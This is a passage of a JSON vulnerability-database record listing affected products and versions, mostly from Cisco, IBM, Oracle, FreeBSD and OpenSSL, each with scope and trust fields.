"mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.10" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "connected grid router 15.6.2.15t", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media players series 5.4 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "telepresence server on multiparty media mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3204.2" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.12" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5:20" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "counter fraud management for safer payments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0" }, { "model": "telepresence server on multiparty media mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3104.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.31" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.17" }, { "model": "digital media players series 5.3 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.19" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "packet tracer", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.3.1" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "unified wireless ip phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.5.1" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "security access manager for web", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.27" }, { "model": "virtual security gateway vsg2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.10" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client on premises", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-2.7" }, { "model": "10.2-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "spa51x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "telepresence server on virtual machine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.9.1" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.7" }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.14" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(3.10000.9)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.16" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.0" }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "telepresence sx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.9" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings for wp8", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-108" }, { "model": "sterling connect:express for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(2.1)" }, { "model": "webex meetings for wp8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.18" }, { "model": "physical access control gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.36" }, { "model": "wide area application services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.5.7" }, { "model": "9.3-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "10.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.10" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.5.41" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "10.1-release-p30", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "netezza platform software 7.2.0.7-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "intelligent automation for cloud", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0.9.8" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "edge digital media player 1.6rb4 5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mds series multilayer switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "abyp-10g-4sr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "9.3-release-p36", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "partner supporting service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.24" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.4.4.0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.11" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "mobility services engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.0" }, { "model": "edge digital media player", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3401.2.0.20" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.1" }, { "model": "abyp-0t-4s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "spa30x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "10.2-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.11" }, { "model": "digital media players series 5.4 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "security access manager for web", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.34" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.2.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.12.2" }, { "model": "tivoli netcool system service monitors fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "jabber for apple ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.2" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.4.7" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "9.3-release-p33", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.5" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ironport email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.112" }, { "model": "spa525g", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.0.5" }, { "model": "9.3-release-p41", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitors fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "telepresence integrator c series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "lancope stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.8" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "cognos business intelligence fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.12" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network controller 1.0.3394m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network controller 1.0.3381m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.1.5" }, { "model": "registered envelope service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "mq appliance m2001", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli netcool system service monitors fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "telepresence content server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.2" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5(4)" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3104.4" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.32" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "asa cx and prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.21" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1)" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50007.3.1" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5(3)" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.30" }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8945" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.18-49" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1.10000.12)" }, { "model": "mq appliance m2000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "telepresence ex series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.3" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.34" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.32" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "10.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.38" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.13-41" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.35" }, { "model": "network admission control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.12" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "10.1-release-p33", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "telepresence conductor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "abyp-0t-0s-4l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "unified attendant console standard", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.115" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.13" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.12" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.3" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5(.1.6)" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified workforce optimization sr3 es5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "unified communications manager 10.5 su3", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "abyp-2t-2s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "abyp-4tl-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.0(0.400)" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9-34" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "abyp-4ts-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": 